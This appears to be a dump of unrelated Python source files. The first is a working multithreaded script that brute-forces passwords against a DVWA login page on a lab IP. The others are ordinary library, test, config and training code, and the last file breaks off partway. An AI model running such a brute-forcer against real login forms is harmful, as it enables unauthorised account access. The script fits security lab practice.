content stringlengths 5 1.05M |
|---|
import requests
import threading
import queue
# 设置基本参数
user_thread = 10
username = "admin"
wordlist_file = "pass1000.txt"
target_url = "http://172.16.100.103/dvwa/login.php"
success_check = "Login failed"
# 定义类
class Bruter(object):
# 初始化时需传参,接受用户名,密码参数
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False
print("Finished setting up for: %s" % username)
# 定义类中多线程方法
def run_bruteforce(self):
for i in range(user_thread):
t = threading.Thread(target=self.web_bruter)
t.start()
# 定义构造http请求包方法
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
post_tags = {'username': 'admin', 'password': brute,'Login':'Login'}
print("\b\b"*100, end="")
print("\rTrying: %s : %s (%d left)" % (self.username, brute.decode('utf-8'), self.password_q.qsize()), end="")
login_response = requests.post(target_url, data=post_tags)
login_result = login_response.text
if success_check not in login_result:
self.found = True
print("\n[*] Bruteforce successful.")
print("[*] Username: %s" % username)
print("[*] Password: %s" % brute.decode('utf-8'))
print("[*] Waiting for other th"
"reads to exit...")
# 定义列举密码并发送函数
def build_wordlist(wordlist_file):
fd = open(wordlist_file, "rb")
raw_words = fd.readlines()
fd.close()
words = queue.Queue()
for word in raw_words:
word = word.rstrip()
words.put(word)
return words
# 运用
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username, words)
bruter_obj.run_bruteforce() |
#
# This file is part of pyasn1-alt-modules software.
#
# Created by Russ Housley with assistance from asn1ate v.0.6.0.
# Modified by Russ Housley to include the opentypemap manager.
#
# Copyright (c) 2019-2021, Vigil Security, LLC
# License: http://vigilsec.com/pyasn1-alt-modules-license.txt
#
# The scrypt Password-Based Key Derivation Function
#
# ASN.1 source from:
# https://www.rfc-editor.org/rfc/rfc8520.txt
# https://www.rfc-editor.org/errata/eid5871
#
from pyasn1.type import constraint
from pyasn1.type import namedtype
from pyasn1.type import univ
from pyasn1_alt_modules import opentypemap
algorithmIdentifierMap = opentypemap.get('algorithmIdentifierMap')
MAX = float('inf')
# Algorithm identifier and parameters for the
# scrypt Password-Based Key Derivation Function
id_scrypt = univ.ObjectIdentifier('1.3.6.1.4.1.11591.4.11')
class Scrypt_params(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('salt',
univ.OctetString()),
namedtype.NamedType('costParameter',
univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(1, MAX))),
namedtype.NamedType('blockSize',
univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(1, MAX))),
namedtype.NamedType('parallelizationParameter',
univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(1, MAX))),
namedtype.OptionalNamedType('keyLength',
univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(1, MAX)))
)
# Update the Algorithm Identifier Map and the S/MIME Capability Map
_algorithmIdentifierMapUpdate = {
id_scrypt: Scrypt_params(),
}
algorithmIdentifierMap.update(_algorithmIdentifierMapUpdate)
|
# Copyright 2022. Tushar Naik
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from enum import Enum
from common.helper import safe_get
"""
includes all models required for the service provider
"""
class HealthcheckStatus(Enum):
HEALTHY = "healthy"
UNHEALTHY = "unhealthy"
class UrlScheme(Enum):
GET = 1
POST = 2
class NodeData(object):
def __init__(self, environment, region, tags):
self.environment = environment
self.region = region
self.tags = tags
@staticmethod
def _is_none(val):
return val is None or len(val) == 0
def to_dict(self):
if self.environment is None and self.region is None and self._is_none(self.tags):
return {}
return {"environment": self.environment, "region": self.region, "tags": self.tags}
class ServiceNode(object):
"""
Represents a service that may be discoverable at a host:port over your favourite transport protocol
"""
def __init__(self,
host: str,
port: int,
node_data: NodeData,
healthcheck_status: HealthcheckStatus,
last_updated_timestamp: int):
self.host = host
self.port = port
self.node_data = node_data
self.last_updated_timestamp = last_updated_timestamp
self.healthcheck_status = healthcheck_status
@classmethod
def create(cls, bytes):
"""
use this factory method to create the ServiceNode from json serialized bytes
:param bytes: json
:return: ServiceNode
"""
node_data_json = json.loads(bytes)
node_data = None
if 'nodeData' in node_data_json:
node_data = NodeData(environment=safe_get(node_data_json['nodeData'], 'environment'),
region=safe_get(node_data_json['nodeData'], 'region'),
tags=safe_get(node_data_json['nodeData'], 'tags'))
return cls(host=node_data_json['host'],
port=int(node_data_json['port']),
node_data=node_data,
healthcheck_status=HealthcheckStatus(HealthcheckStatus.HEALTHY
if safe_get(node_data_json, 'healthcheckStatus') == 'healthy'
else HealthcheckStatus.UNHEALTHY),
last_updated_timestamp=int(node_data_json['lastUpdatedTimeStamp']))
def to_dict(self):
return {"host": self.host, "port": self.port, "nodeData": self.node_data.to_dict(),
"healthcheckStatus": self.healthcheck_status.value, "lastUpdatedTimeStamp": self.last_updated_timestamp}
def get_host(self):
"""
:return: hostname
"""
return self.host
def get_host_port(self):
"""
:return: host port pair
"""
return self.host, self.port
def get_endpoint(self, secure=False):
"""
:param secure: if the scheme to be used is secure
:return: endpoint URL
"""
scheme = "https" if secure else "http"
return f"{scheme}://{self.host}:{self.port}"
def get_port(self):
"""
:return: port
"""
return self.port
def get_node_data(self):
"""
:return: node data
"""
return self.node_data
class ServiceDetails(object):
def __init__(self, host, port, environment, namespace, service_name, region=None, tags=None):
self.host = host
self.port = port
self.namespace = namespace
self.service_name = service_name
self.environment = environment
self.region = region
self.tags = tags
def get_path(self):
return f"/{self.namespace}/{self.service_name}/{self.host}:{self.port}"
def get_root_path(self):
return f"/{self.namespace}/{self.service_name}"
def to_dict(self):
return {"host": self.host, "port": self.port, "environment": self.environment, "namespace": self.namespace,
"service": self.service_name}
class ClusterDetails(object):
def __init__(self, zk_string, update_interval_in_secs=1):
self.zk_string = str(zk_string)
self.update_interval_in_secs = update_interval_in_secs
def to_dict(self):
return {"zk_string": self.zk_string, "update_interval_in_secs": self.update_interval_in_secs}
|
# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.backend.python.target_types import COMMON_PYTHON_FIELDS, PythonSources
from pants.engine.target import Dependencies, Target
class PylintPluginSources(PythonSources):
required = True
# NB: We solely subclass this to change the docstring.
class PylintPluginDependencies(Dependencies):
"""Addresses to other targets that this plugin depends on.
Due to restrictions with Pylint plugins, these targets must either be third-party Python
dependencies (https://www.pantsbuild.org/docs/python-third-party-dependencies) or be located
within this target's same directory or a subdirectory.
"""
class PylintSourcePlugin(Target):
"""A Pylint plugin loaded through source code.
To load a source plugin:
1. Write your plugin. See http://pylint.pycqa.org/en/latest/how_tos/plugins.html.
2. Define a `pylint_source_plugin` target with the plugin's Python file(s) included in the
`sources` field.
3. Add the parent directory of your target to the `root_patterns` option in the `[source]`
scope. For example, if your plugin is at `build-support/pylint/custom_plugin.py`, add
'build-support/pylint'. This is necessary for Pants to know how to tell Pylint to
discover your plugin. See https://www.pantsbuild.org/docs/source-roots.
4. Add `load-plugins=$module_name` to your Pylint config file. For example, if your Python
file is called `custom_plugin.py`, set `load-plugins=custom_plugin`. Set the `config`
option in the `[pylint]` scope to point to your Pylint config file.
5. Set the option `source_plugins` in the `[pylint]` scope to include this target's
address, e.g. `source_plugins = ["build-support/pylint:plugin"]`.
To instead load a third-party plugin, set the option `extra_requirements` in the `[pylint]`
scope (see https://www.pantsbuild.org/docs/python-linters-and-formatters). Set `load-plugins` in
your config file, like you'd do with a source plugin.
This target type is treated similarly to a `python_library` target. For example, Python linters
and formatters will run on this target.
You can include other targets in the `dependencies` field, so long as those targets are
third-party dependencies or are located in the same directory or a subdirectory.
Other targets can depend on this target. This allows you to write a `python_tests` target for
this code or a `python_distribution` target to distribute the plugin externally.
"""
alias = "pylint_source_plugin"
core_fields = (*COMMON_PYTHON_FIELDS, PylintPluginDependencies, PylintPluginSources)
|
#
# MIT License
#
# Copyright (c) 2020 Airbyte
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import pytest
import requests
import responses
from airbyte_cdk.sources.streams.http.auth import NoAuth
from source_us_census.source import UsCensusStream
@pytest.fixture
def us_census_stream():
return UsCensusStream(
query_params={},
query_path="data/test",
api_key="MY_API_KEY",
authenticator=NoAuth(),
)
simple_test = '[["name","id"],["A","1"],["B","2"]]'
example_from_docs_test = (
'[["STNAME","POP","DATE_","state"],'
'["Alabama","4849377","7","01"],'
'["Alaska","736732","7","02"],'
'["Arizona","6731484","7","04"],'
'["Arkansas","2966369","7","05"],'
'["California","38802500","7","06"]]'
)
@responses.activate
@pytest.mark.parametrize(
"response, expected_result",
[
(
simple_test,
[{"name": "A", "id": "1"}, {"name": "B", "id": "2"}],
),
(
(
example_from_docs_test,
[
{
"STNAME": "Alabama",
"POP": "4849377",
"DATE_": "7",
"state": "01",
},
{"STNAME": "Alaska", "POP": "736732", "DATE_": "7", "state": "02"},
{
"STNAME": "Arizona",
"POP": "6731484",
"DATE_": "7",
"state": "04",
},
{
"STNAME": "Arkansas",
"POP": "2966369",
"DATE_": "7",
"state": "05",
},
{
"STNAME": "California",
"POP": "38802500",
"DATE_": "7",
"state": "06",
},
],
)
),
(
'[["name","id"],["I have an escaped \\" quote","I have an embedded , comma"],["B","2"]]',
[
{
"name": 'I have an escaped " quote',
"id": "I have an embedded , comma",
},
{"name": "B", "id": "2"},
],
),
],
)
def test_parse_response(us_census_stream: UsCensusStream, response: str, expected_result: dict):
responses.add(
responses.GET,
us_census_stream.url_base,
body=response,
)
resp = requests.get(us_census_stream.url_base)
assert list(us_census_stream.parse_response(resp)) == expected_result
type_string = {"type": "string"}
@responses.activate
@pytest.mark.parametrize(
"response, expected_schema",
[
(
simple_test,
{
"name": type_string,
"id": type_string,
},
),
(
example_from_docs_test,
{
"STNAME": type_string,
"POP": type_string,
"DATE_": type_string,
"state": type_string,
},
),
],
)
def test_discover_schema(us_census_stream: UsCensusStream, response: str, expected_schema: dict):
responses.add(
responses.GET,
f"{us_census_stream.url_base}{us_census_stream.query_path}",
body=response,
)
assert us_census_stream.get_json_schema().get("properties") == expected_schema
|
#!/usr/bin/env python3
import logging
import argparse
from version.VersiON import VersiON
import version.git_help
def main(args):
logger = logging.getLogger(__file__)
versiON = VersiON(args.style_name, args.config)
if args.name is not None:
versiON.style.set_variable('{component_name}', args.name)
logger.info(f"Picked versioning style: {args.style_name}")
git = version.git_help.GitHelp()
previous_release_tag = git.get_previous_release_tag(args.sha1, versiON.style.config['regex'])
if previous_release_tag is not None and not versiON.match_style(previous_release_tag):
current_pattern = versiON.style.config['pattern']
raise Exception(
f"Different version style. Previous release:{previous_release_tag} and currently picked:{current_pattern}")
commits_to_release_messages = git.get_commits(args.sha1, previous_release_tag)
if len(commits_to_release_messages) < 1:
logger.info("Nothing to release")
print(previous_release_tag)
return
release_name = versiON.bump_version(
previous_release_tag, commits_to_release_messages)
if args.enable_mark_wip:
logger.info("New version (WIP):")
print(
f"{release_name}{versiON.config['DEFAULT']['work_in_progress_sufix']}")
else:
logger.info("New version:")
print(release_name)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--config", help="Config file path, if not specified then default used. Check config/")
parser.add_argument(
"--style-name", help="Example: revision, semantic", required=True)
parser.add_argument(
"--name", help="Example: MyApp")
parser.add_argument(
"--enable-mark-wip", help="add sufix to VERSION when version isn't released. Sufix is set in config file",
action="store_true")
parser.add_argument(
"--verbose", help="", action="store_true")
parser.add_argument(
"--sha1", help="you can specify which commit to treat as HEAD", default="HEAD")
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.ERROR)
main(args)
exit(0)
|
# -*- coding: utf-8 -*-
import os
from genotype.server.app import create_app
config = {
"GENOTYPE_INCLUDE_KEY": "-CG-",
"GENOTYPE_GENOTYPE_DIR": os.environ.get("GENOTYPE_GENOTYPE_DIR"),
"GENOTYPE_MAX_NOCALLS": 15,
"GENOTYPE_MAX_MISMATCH": 3,
"GENOTYPE_MIN_MATCHES": 35,
"SQLALCHEMY_DATABASE_URI": os.environ["SQLALCHEMY_DATABASE_URI"],
"SQLALCHEMY_TRACK_MODIFICATIONS": False,
# user management
"GOOGLE_OAUTH_CLIENT_ID": os.environ["GOOGLE_OAUTH_CLIENT_ID"],
"GOOGLE_OAUTH_CLIENT_SECRET": os.environ["GOOGLE_OAUTH_CLIENT_SECRET"],
}
application = create_app(config_obj=config)
|
"""Traceability"""
__version__ = '0.1.dev'
__license__ = 'BSD License'
__author__ = 'Joost VanDorp'
__email__ = 'joostvandorp@gmail.com'
__url__ = 'https://github.com/vandorjw/django-traceability'
|
from basepokemon import BasePokemon, BaseMove, Type
class Pokemon(BasePokemon):
def __init__(self):
BasePokemon.__init__(self)
# Has to sum to 100
self.spend_hp(30)
self.spend_attack(50)
self.spend_defence(20)
self.add_move(Escupitajo_nuclear())
self.add_move(Agua_contaminada())
self.add_move(Mirada_tierna())
self.add_move(Patada_pequena())
self.set_type(Type.WATER)
self.move = 0
self.moves = ['Escupitajo nuclear', "Chorro de agua contaminada", "Mirada tierna", "Patada pequeña"]
def get_name(self):
return "Axolotin"
def choose_move(self, enemy):
mov = self.moves[self.move]
self.move = self.move + 1 if self.move < len(self.moves) - 1 else 0
return self.get_move_by_name(mov)
class Escupitajo_nuclear(BaseMove):
def __init__(self):
BaseMove.__init__(self)
self.choose_uses(1)
self.set_type(Type.WATER)
def get_name(self):
return "Escupitajo nuclear"
class Agua_contaminada(BaseMove):
def __init__(self):
BaseMove.__init__(self)
self.choose_uses(1)
self.set_type(Type.WATER)
def get_name(self):
return "Chorro de agua contaminada"
class Mirada_tierna(BaseMove):
def __init__(self):
BaseMove.__init__(self)
self.choose_uses(1)
self.set_type(Type.NORMAL)
def get_name(self):
return "Mirada tierna"
class Patada_pequena(BaseMove):
def __init__(self):
BaseMove.__init__(self)
self.choose_uses(1)
self.set_type(Type.NORMAL)
def get_name(self):
return "Patada pequeña"
|
"""
Exceptions that are raised by sam package
"""
from samcli.commands.exceptions import UserException
class InvalidLocalPathError(UserException):
def __init__(self, resource_id, property_name, local_path):
self.resource_id = resource_id
self.property_name = property_name
self.local_path = local_path
message_fmt = (
"Parameter {property_name} of resource {resource_id} refers "
"to a file or folder that does not exist {local_path}"
)
super().__init__(
message=message_fmt.format(
resource_id=self.resource_id, property_name=self.property_name, local_path=self.local_path
)
)
class InvalidTemplateUrlParameterError(UserException):
def __init__(self, resource_id, property_name, template_path):
self.resource_id = resource_id
self.property_name = property_name
self.template_path = template_path
message_fmt = (
"{property_name} parameter of {resource_id} resource is invalid. "
"It must be a S3 URL or path to CloudFormation "
"template file. Actual: {template_path}"
)
super().__init__(
message=message_fmt.format(
property_name=self.property_name, resource_id=self.resource_id, template_path=self.template_path
)
)
class ExportFailedError(UserException):
def __init__(self, resource_id, property_name, property_value, ex):
self.resource_id = resource_id
self.property_name = property_name
self.property_value = property_value
self.ex = ex
message_fmt = (
"Unable to upload artifact {property_value} referenced "
"by {property_name} parameter of {resource_id} resource."
"\n"
"{ex}"
)
super().__init__(
message=message_fmt.format(
property_value=self.property_value,
property_name=self.property_name,
resource_id=self.resource_id,
ex=self.ex,
)
)
class ImageNotFoundError(UserException):
def __init__(self, resource_id, property_name):
self.resource_id = resource_id
self.property_name = property_name
message_fmt = "Image not found for {property_name} parameter of {resource_id} resource. \n"
super().__init__(
message=message_fmt.format(
property_name=self.property_name,
resource_id=self.resource_id,
)
)
class ECRAuthorizationError(UserException):
def __init__(self, msg):
self.msg = msg
super().__init__(message=self.msg)
class DockerLoginFailedError(UserException):
def __init__(self, msg):
self.msg = msg
super().__init__(message=self.msg)
class DockerPushFailedError(UserException):
def __init__(self, msg):
self.msg = msg
super().__init__(message=self.msg)
class DockerGetLocalImageFailedError(UserException):
def __init__(self, msg):
self.msg = msg
super().__init__(message=self.msg)
class PackageFailedError(UserException):
def __init__(self, template_file, ex):
self.template_file = template_file
self.ex = ex
message_fmt = "Failed to package template: {template_file}. \n {ex}"
super().__init__(message=message_fmt.format(template_file=self.template_file, ex=self.ex))
class NoSuchBucketError(UserException):
def __init__(self, **kwargs):
self.kwargs = kwargs
message_fmt = "\nS3 Bucket does not exist."
super().__init__(message=message_fmt.format(**self.kwargs))
class BucketNotSpecifiedError(UserException):
def __init__(self, **kwargs):
self.kwargs = kwargs
message_fmt = "\nS3 Bucket not specified, use --s3-bucket to specify a bucket name or run sam deploy --guided"
super().__init__(message=message_fmt.format(**self.kwargs))
class PackageResolveS3AndS3SetError(UserException):
def __init__(self):
message_fmt = "Cannot use both --resolve-s3 and --s3-bucket parameters. Please use only one."
super().__init__(message=message_fmt)
class PackageResolveS3AndS3NotSetError(UserException):
def __init__(self):
message_fmt = "Cannot skip both --resolve-s3 and --s3-bucket parameters. Please provide one of these arguments."
super().__init__(message=message_fmt)
|
# Copyright (c) 2016, Samantha Marshall (http://pewpewthespells.com)
# All rights reserved.
#
# https://github.com/samdmarshall/pyconfig
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of Samantha Marshall nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import sys
import string
import itertools
import unittest
import pyconfig
import pyconfig.Deserializer.xcconfig
test_directory = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'tests')
def LoadTestDirectoryAndTestWithName(test, test_pyconfig_path_sub, test_file_name, additional_flags=[], override=False):
test_pyconfig_path = os.path.join(test_directory, test_pyconfig_path_sub)
test_generated_output = os.path.join(test_pyconfig_path, test_file_name+'.xcconfig')
test_expected_output = os.path.join(test_pyconfig_path, test_file_name+'_output.xcconfig')
args = ['--quiet']
if not override:
args.append(test_pyconfig_path)
args.extend(additional_flags)
pyconfig.main(args)
generated_output = pyconfig.Deserializer.xcconfig.xcconfig(test_generated_output)
expected_output = pyconfig.Deserializer.xcconfig.xcconfig(test_expected_output)
test.assertEqual(len(generated_output.lines), len(expected_output.lines))
for generated, expected in list(zip(generated_output.lines, expected_output.lines)):
test.assertEqual(generated, expected)
class pyconfigTestCases(unittest.TestCase):
def test_comments(self):
LoadTestDirectoryAndTestWithName(self, 'comments', 'test')
def test_conditionals(self):
LoadTestDirectoryAndTestWithName(self, 'conditionals', 'test')
def test_direct_assignment_specific(self):
LoadTestDirectoryAndTestWithName(self, 'direct assignment/specific', 'test')
def test_direct_assignment_automatic(self):
LoadTestDirectoryAndTestWithName(self, 'direct assignment/automatic', 'test')
def test_export_with_keyword(self):
LoadTestDirectoryAndTestWithName(self, 'export/with-export', 'defaults')
def test_export_with_keyword_and_include(self):
LoadTestDirectoryAndTestWithName(self, 'export/with-export-and-include', 'defaults')
def test_export_without_keyword(self):
LoadTestDirectoryAndTestWithName(self, 'export/without-export', 'test')
def test_include_optional(self):
LoadTestDirectoryAndTestWithName(self, 'include/optional', 'test')
def test_include_required(self):
LoadTestDirectoryAndTestWithName(self, 'include/required', 'test')
def test_include_legacy(self):
LoadTestDirectoryAndTestWithName(self, 'include/legacy', 'test')
def test_include_missing_required(self):
LoadTestDirectoryAndTestWithName(self, 'include/missing required', 'test')
def test_inherits(self):
LoadTestDirectoryAndTestWithName(self, 'inherits', 'test')
def test_variable_substitution_with_use(self):
LoadTestDirectoryAndTestWithName(self, 'variable substitution/with-use', 'test')
def test_variable_substitution_without_use(self):
LoadTestDirectoryAndTestWithName(self, 'variable substitution/without-use', 'test')
def test_search_direct_file(self):
test_pyconfig_path_sub = 'search/direct-file'
test_pyconfig_path = os.path.join(test_directory, test_pyconfig_path_sub)
direct_file_path = os.path.join(test_pyconfig_path, 'test.pyconfig')
LoadTestDirectoryAndTestWithName(self, test_pyconfig_path_sub, 'test', [direct_file_path], True)
def test_search_directory_path(self):
test_pyconfig_path_sub = 'search/directory'
test_pyconfig_path = os.path.join(test_directory, test_pyconfig_path_sub)
LoadTestDirectoryAndTestWithName(self, test_pyconfig_path, 'test-dir/test', [test_pyconfig_path], True)
def test_duplicate_definition_single_file(self):
LoadTestDirectoryAndTestWithName(self, 'duplicate definitions/single file', 'test')
def test_duplicate_definition_multiple_files(self):
test_pyconfig_path_sub = 'duplicate definitions/multiple files'
test_pyconfig_path = os.path.join(test_directory, test_pyconfig_path_sub)
LoadTestDirectoryAndTestWithName(self, test_pyconfig_path, 'test', [test_pyconfig_path], True)
def test_flags_scheme_name(self):
LoadTestDirectoryAndTestWithName(self, 'flags/scheme name', 'test', ['--scheme', 'MyAppDebug'])
def test_scm_info_git(self):
LoadTestDirectoryAndTestWithName(self, 'flags/scm-info/git', 'test', ['--scm-info=git'])
def test_scm_info_svn(self):
LoadTestDirectoryAndTestWithName(self, 'flags/scm-info/svn', 'test', ['--scm-info=svn'])
def test_scm_info_hg(self):
LoadTestDirectoryAndTestWithName(self, 'flags/scm-info/hg', 'test', ['--scm-info=hg'])
def test_scm_info_detect(self):
test_pyconfig_path_sub = 'flags/scm-info/git'
test_pyconfig_path = os.path.join(test_directory, test_pyconfig_path_sub)
direct_file_path = os.path.join(test_pyconfig_path, 'test.pyconfig')
LoadTestDirectoryAndTestWithName(self, test_pyconfig_path, 'test', ['--scm-info=detect', direct_file_path], True)
def test_debug_flag(self):
LoadTestDirectoryAndTestWithName(self, 'comments', 'test', ['--verbose', '--debug'])
if __name__ == '__main__':
unittest.main() |
import os # noqa
from argparse import ArgumentParser, Namespace
from math import ceil
from pathlib import Path
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from ignite.contrib.handlers import WandBLogger
from ignite.engine import Engine, EventEnum, Events, create_supervised_evaluator, create_supervised_trainer
from ignite.handlers import Checkpoint, DiskSaver
from ignite.metrics import Accuracy, Loss, RunningAverage
from ignite.utils import setup_logger
from matplotlib.backends.backend_agg import FigureCanvasAgg
from torch.utils.data import DataLoader
from nemo.datasets import classification_dataloaders
from nemo.models import initialize_classifier
from nemo.utils import ensure_reproducibility, random_state_protection, timestamp_path
class CustomEvents(EventEnum):
EXAMPLE_DATA_READY = "example_data_ready"
EXAMPLE_PREDICTIONS_READY = "example_predictions_ready"
def main(args):
# TODO(thomasjo): Make this be configurable.
ensure_reproducibility(seed=42)
# Append timestamp to output directory.
args.output_dir = timestamp_path(args.output_dir)
args.output_dir.mkdir(parents=True)
# Development mode overrides.
args.log_interval = 1 if args.dev_mode else 10
args.max_epochs = 2 if args.dev_mode else args.max_epochs
args.epoch_length = 2 if args.dev_mode else None
# TODO(thomasjo): Transition away from pre-partitioned datasets to on-demand partitioning.
train_dataloader, val_dataloader, test_dataloader = classification_dataloaders(args.data_dir, num_workers=args.num_workers)
num_classes = len(train_dataloader.dataset.classes)
model = initialize_classifier(num_classes)
model = model.to(device=args.device)
optimizer = optim.Adam(model.parameters(), lr=1e-5)
criterion = nn.NLLLoss()
metrics = {
"loss": Loss(criterion, output_transform=metric_transform),
"accuracy": Accuracy(output_transform=metric_transform),
}
trainer = create_trainer(model, optimizer, criterion, metrics, args)
evaluator = create_evaluator(model, metrics, args)
test_evaluator = create_evaluator(model, metrics, args, name="test_evaluator")
# Register custom events.
trainer.register_events(*CustomEvents)
@trainer.on(Events.EPOCH_COMPLETED)
def compute_validation_metrics(engine: Engine):
# Development mode overrides.
max_epochs = args.max_epochs if args.dev_mode else None
epoch_length = args.epoch_length if args.dev_mode else None
evaluator.run(val_dataloader, max_epochs=max_epochs, epoch_length=epoch_length)
@trainer.on(Events.COMPLETED)
def compute_test_metrics(engine: Engine):
# Development mode overrides.
max_epochs = args.max_epochs if args.dev_mode else None
epoch_length = args.epoch_length if args.dev_mode else None
test_evaluator.run(test_dataloader, max_epochs=max_epochs, epoch_length=epoch_length)
@trainer.on(Events.ITERATION_COMPLETED(every=args.log_interval))
def log_training_metrics(engine: Engine):
engine.logger.info("Epoch[{}] Iteration[{}/{}] Loss: {:.4f} Accuracy: {:.4f}".format(
engine.state.epoch,
engine.state.iteration,
engine.state.max_epochs * engine.state.epoch_length,
engine.state.metrics["loss"],
engine.state.metrics["accuracy"],
))
configure_checkpoint_saving(trainer, evaluator, model, optimizer, args)
configure_example_predictions(trainer, train_dataloader, val_dataloader, model, args)
configure_wandb_logging(trainer, evaluator, test_evaluator, model, criterion, optimizer, args)
# Kick off the whole model training shebang...
trainer.run(train_dataloader, max_epochs=args.max_epochs, epoch_length=args.epoch_length)
def create_trainer(model, optimizer, criterion, metrics, args):
trainer = create_supervised_trainer(
model,
optimizer,
criterion,
device=args.device,
non_blocking=True,
output_transform=trainer_transform,
)
# Configure default engine output logging.
trainer.logger = setup_logger("trainer")
# Compute running averages of metrics during training.
for name, metric in metrics.items():
RunningAverage(metric).attach(trainer, name)
return trainer
def create_evaluator(model, metrics, args, name="evaluator"):
evaluator = create_supervised_evaluator(
model,
metrics,
device=args.device,
non_blocking=True,
output_transform=evaluator_transform,
)
# Configure default engine output logging.
evaluator.logger = setup_logger(name)
return evaluator
def configure_checkpoint_saving(trainer, evaluator, model, optimizer, args):
to_save = {"model": model, "optimizer": optimizer}
save_handler = DiskSaver(str(args.output_dir), create_dir=False, require_empty=False)
# Configure epoch checkpoints.
interval = 1 if args.dev_mode else min(5, args.max_epochs)
checkpoint = Checkpoint(to_save, save_handler, n_saved=None, global_step_transform=lambda *_: trainer.state.epoch)
trainer.add_event_handler(Events.EPOCH_COMPLETED(every=interval), checkpoint, evaluator)
# Configure "best score" checkpoints.
metric_name = "accuracy"
best_checkpoint = Checkpoint(to_save, save_handler, score_name=metric_name, score_function=lambda engine: engine.state.metrics[metric_name], filename_prefix="best")
trainer.add_event_handler(Events.EPOCH_COMPLETED, best_checkpoint, evaluator)
def configure_example_predictions(trainer: Engine, train_dataloader, val_dataloader, model, args):
example_batch_size = 32
with random_state_protection():
train_examples = grab_shuffled_data(train_dataloader, example_batch_size, args)
val_examples = grab_shuffled_data(val_dataloader, example_batch_size, args)
@trainer.on(Events.EPOCH_STARTED)
def store_examples(engine: Engine):
engine.state.examples = {"training": train_examples, "validation": val_examples}
engine.logger.info("Example data ready")
engine.fire_event(CustomEvents.EXAMPLE_DATA_READY)
@trainer.on(Events.EPOCH_COMPLETED)
def predict_on_examples(engine: Engine):
model.eval()
for tag, (x, y) in engine.state.examples.items():
with torch.no_grad():
y_pred = model(x.to(device=args.device))
y_pred = y_pred.detach().cpu()
engine.state.examples[tag] = (x, y, y_pred)
engine.logger.info("Example predictions ready")
engine.fire_event(CustomEvents.EXAMPLE_PREDICTIONS_READY)
def configure_wandb_logging(trainer, evaluator, test_evaluator, model, criterion, optimizer, args):
if args.dev_mode:
os.environ["WANDB_MODE"] = "dryrun"
wandb_logger = WandBLogger(dir=str(args.output_dir))
wandb_logger.watch(model, criterion, log="all", log_freq=args.log_interval)
# Log training-specific metrics.
wandb_logger.attach_output_handler(
trainer,
event_name=Events.ITERATION_COMPLETED(every=args.log_interval),
tag="training",
output_transform=lambda output: {"batchloss": output["loss"]},
global_step_transform=lambda *_: trainer.state.iteration,
)
# Configure basic metric logging.
for tag, engine in [("training", trainer), ("validation", evaluator), ("test", test_evaluator)]:
wandb_logger.attach_output_handler(
engine,
event_name=Events.EPOCH_COMPLETED,
tag=tag,
metric_names="all",
global_step_transform=lambda *_: trainer.state.iteration,
)
